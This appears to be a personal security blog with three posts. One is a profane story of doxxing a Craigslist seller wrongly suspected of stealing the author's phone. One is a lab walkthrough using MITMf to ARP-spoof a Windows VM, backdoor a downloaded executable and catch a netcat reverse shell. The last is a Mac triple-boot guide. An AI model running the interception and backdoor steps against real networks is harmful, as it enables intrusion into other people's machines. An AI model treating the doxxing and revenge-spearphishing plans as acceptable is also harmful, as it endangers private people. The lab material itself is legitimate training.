Saturday, February 25, 2017

Why circumstantial evidence is garbage: an almost tale of revenge

I was a dummy.

I was dropping off some Mark Zuckerturds in the pool at BSides SF and, after wiping my ass, I did not pick my phone back up.  I just left it in there, like a dumpster baby.  Well, actually, with dumpster babies there's intent to leave them there, so that comparison wasn't all that great.

I went back for my phone after 10 mins, it was gone.  Ask to use someone's phone to find mine, it's off.  It had 23% battery.  That son of a bitch shut off my phone.  I get on the mic:

"Look, I left my phone in the bathroom, it'd be really great if I got it back, it's a Nexus 6.  I know only liek 10% of you could hack it, it's got full disk encryption and it's the current version of android"
(10% was a generous number, but, given my weak passphrase choice, a determined attacker could probably bruteforce it in a week or 2. Or one of those fucks could know how to flash a new rom and bypass the activation lock since my dumbass left the bootloader unlocked)

Someone asked what my name was from the audience, and how to return it.

"Chauncey Davenport, I'm from New York, just give the phone to security"

Someone asked what my social security number was and I heard a few other infosec first date questions.  I got back on the mic:

"My first pet's name was Chauncey Davenport as well"

It made things easy when I was a kid, albeit confusing when my mom asked who shit on the floor.

I moped around the DNA lounge for the rest of the day, laundering drink tickets for redbulls to try to make myself feel better.

That night I open up craigslist with the intent of finding a new phone.  I look for a Nexus 6 and low and behold:





That's my phone... that's my fucking phone you piece of shit.  Same location, same color, same capacity, posted 2 hours or so after BSides ended.  No contact info in the ad, screen isn't on in the picture.  This piece of living human fucking garbage hasn't even gotten past my fucking FDE, that's why the screen isn't on.  Look at the lint around the camera where the case was, he didn't even wipe the phone down before listing it, he wanted his fucking meth that badly.  WHERE'S THE CASE YOU FUCK, LET ME SEE IT, PUT IT IN YOUR AD, I KNOW IT'S MINE.  Only 200$ for that phone? My phone was in great condition and you disrespect me like that? 

Send him a few emails from some fake accounts that night, no reply.  Email him from my normie account (fucking terrible opsec), no reply, girlfriend emails him... we get a reply. Trying not to sound too eager we take it slow and tell him we're interested in the phone. My girlfriend manages to get his number. 

Money

So I plug his phone number into facebook, bam! I got him.  

Well, maybe this guy stole the phone he's using for craigslist.  Ummm think again, sweetie;

See that pinky ring in the reflection of the phone photo?  Oh yea, same pinky ring in his profile picture.  I got him, I fucking got him.  Found rando tax records online, found his regular email on his github.  Found friends, found family, linkedin, all his social media.  Even his home address through familytreenow.com.  fuckinPreOwned.jpg

(cept the address wasn't current, which I later found out)

I'd tried to do this the legal way, the cops told me they didn't have time for my shit.  Time for vigilante justice.  I'm Batman and my cause is just.  Imma get you, in a year or so, when you've forgotten, Imma spearfish you and ruin your life in all of the most hilarious and mean spirited ways.

The guy keeps flaking (probably can't get past my shitty password or past google's activation lock).  1 week of him canceling and all sorts of shit and it's come down.  I'm finally gonna meet him.  What do I do?  At this point I really don't care if I get my phone back, I just want proof.  Just matching IMEIs. I walk into safeway, my girlfriend watches what car he pulls up in, takes a photo of his license plate. I meet him inside.

Guy hands my the phone.  It isn't mine, the case is different.  He could have changed the case but still hopeful.  Looks like he's been using it, it's got more than just default apps. Shit, it probably isn't my phone.  Check the IMEI, it's different.  This isn't my phone.  All of the planning, all of the sleepless nights aggregating this dudes digital life for nothing.  

I explain to the guy that it was supposed to be a craigslist sting, and that I was sorry for wasting his time.  He was actually a pretty cool dude.

Look, I know you can change IMEIs and fake user apps, and change a case, but this dude's opsec wasn't that strong if he was giving out his real number.  If he did take the phone, changed the IMEI, got a different case, and populated it with random apps, I can't even be mad.  That would just be impressive, I'd be proud and he could keep the fucking phone.

And that's why circumstantial evidence is garbage and why our judicial system is garbage, blah blah blah, prison industrial complex, terrorists, blah blah, innocent people suffer blah blah, human rights blah justice.  Blah blah constitution, bill of rights blah blah blah.  

"Inspirational quote"
- Chauncey Davenport

Sunday, January 25, 2015

Injecting payloads on the fly using MITMf

Check out Dan's rogue AP version of this attack, with BDFproxy using MACH-O backdoors.


MITMf by byt3bl33der has several modules that help in automating man in the middle attacks.  This lab demonstrates the filepwn plugin being used in conjunction with the arp spoofing plugin to intercept executables being downloaded over http and patch our payload into them.

We'll be arp poisoning a virtual instance of Windows 7 with a Kali VM, and patching a reverse shell into an executable downloaded from an unsecured http site using internet explorer.

On the Windows 7 machine:
Run CMD, then ipconfig
--Take note of your gateway and IP address

On the Kali Machine:
Edit your sources.list ---> nano /etc/apt/sources.list

Make sure your hosts file matches:

## Regular repositories
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
## Source repositories
deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

##################################

--Back in terminal
apt-get install mitmf
ifconfig

--Take note of your IP address

nano /usr/share/mitmf/config_files/filepwn.cfg

--Edit the host IP address to reflect your Kali linux host.

--Take note of the port number used for the callback on your Windows x32 reverse tcp shell (the binary we're working with is 32 bit, so port 6666 is default, and what I'm going with here.)

mitmf --arp --spoof --iface eth0 --host xxx.xxx.xxx.xxx --gateway yyy.yyy.yyy.yyy --target zzz.zzz.zzz.zzz --filepwn

--Plug in those numbers you took note of earlier

--In another terminal tab:
nc -l -p 6666

--Fill in the port value as the port you took note of from the filepwn.cfg file


Windows 7 Machine:

Open up internet explorer
Go to live.internals.com
Click an executable, preferably tcpview.exe
Save, then run it

--Check your kali host for a shell back to your netcat instance

No netcat? go to your windows host and run tcpview and look for an outbound connection to your local network.  Is the IP and port it's connecting to not your kali instance?  Correct it in pwnfile.cfg.


Some caveats:
Windows will warn you about running these modified binaries because backdoor factory strips the pe header, so there's no signature on it. There are ways around this but that's outside the scope of this writeup.
Also, remember the victim AV is off

Special thanks to Dan (http://lockboxx.blogspot.com/) for all the help

Thank you byt3bl33d3r, and secretsquirrel for all of your hard work developing these tools

References:
https://github.com/byt3bl33d3r/MITMf

Monday, May 12, 2014

How to triple boot a Macbook Pro with Kali Linux and Windows 7

In my quest to create a pen test lab, I discovered that I just don't have enough ram to run everything I want to in virtual machines.  I have a late 2011 Macbook Pro running OSX Mavericks.  Why do I need physical installations of Windows 7 and Kali Linux?  Emulating android within Kali, within OSX, was painfully slow.  There are are android tools that work best within native Windows installations, and password cracking things like WPA2 on Kali tends to work better when you're not limited by the constraints of VMware Fusion and their lackluster GPU support.

Triple booting my Macbook was painfully more annoying than any multi-boot set up on any device I have encountered.  This is because it became a source of ongoing psychosis in the face of utter failure.  I couldn't let my computer beat me, so this is how I won:

*This guide probably wont help you with your Macbook air
*This method is only going to work if you have 1 partition to begin with
*I'm not responsible if you lose your data, you should have backed it up
*I'm assuming you've installed operating systems before and you're familiar with the setup for Windows and Kali Linux, and some command line stuff

--First off, you're going to need 2 DVDs, one for Kali Linux, and one for Windows 7.
(DVDs, not flash drives.  I tried the flash drives, it was a nightmare)

--You're also going to need 1 flash drive > 2gb

--Download and install refit

--Download and install fdisk for mac

--Put the Windows 7 disk in your computer, insert your flash drive, start boot camp assistant

--Click continue, Check the boxes next to 'Download the latest Windows Support Software from Apple' and 'Install or remove Windows 7 or later'.  Then click continue.  (You'll want that support software when it comes time to install drivers in Windows, because your wireless internets wont work immediately after post installation)

--Select your flash drive as the destination for your Windows driver pack.

--Wait as it downloads and does it's thing.

--When the partition screen comes up, go ahead and resize it if you like.

--Let it do it's thing till it reboots into your Windows setup disc

--Click next, install, custom installation, etc.  When you reach the hard drive/ partition page, click the bootcamp partition.  Click advanced options.  Delete it, click new, click next.  Grab a snack while Windows installs.

--Once Windows is done and you're on your Windows 7 desktop, eject your installation DVD, restart your computer (install your drivers when you're done with this guide, it can wait).  Wait for the chime and hold down your 'alt' key.  Select OSX, if refit comes up, select OSX again.

--When OSX has booted, open up Disk Utility, and select your hard drive.  Click the partitions tab and click the + sign, adjust the size to fit your Kali installation.  Label it Kali or anything you like.  Set the partition type as fat or exfat.  Apply liberally.

--Put your Kali disc in your computer and restart it.

--Refit should come up, select the linux disc when it does, select restart if it doesn't sometimes the drive doesn't spin up fast enough.

--Install Kali linux, when it asks you for the missing firmware just skip it.  You can install that later too

--Go through the installation like you normally would, when you get to the partitioning setup, click manual.

--Select your disk labeled Kali, or whatever you chose to call it.  Look at the number next to it, which partition number is it?  Remember it, we'll call it partition X for the purpose of this guide.  Select this partition, set root point as /, format as ext4, and set it as bootable.

--Save the changes and continue with the setup, ignore the swap partition message, deal with it later.

--Grab another snack, possibly a scone.  Wait till the installer finishes.  It'll ask you where you want to install grub, type in /dev/sdaX (X is our place holder for that number I had you remember)

Congratulations!  Both of your installations are now broken!

--Restart your computer into OSX

--Eject your Kali Linux install disk

--Open terminal and type
sudo gdisk /dev/disk0
r
p
It'll list your partitions
h
--It'll ask you to put the partitions in that you want to be able to boot from, for me it was 2 3 4
--It'll ask you if you want to put the efi partition first, you should do that.
--It'll ask you for the MBR codes, refer to the list of your partitions and add the first 2 digits of the hexidecimal number (defaults should work)

--Don't set any flags as bootable

--Once finished hit w if you messed up hit q and try it again.

--Restart your computer, in the refit menu select the linux installation

--It should give you the option to boot all the things.

--Finish your driver installs and do your thing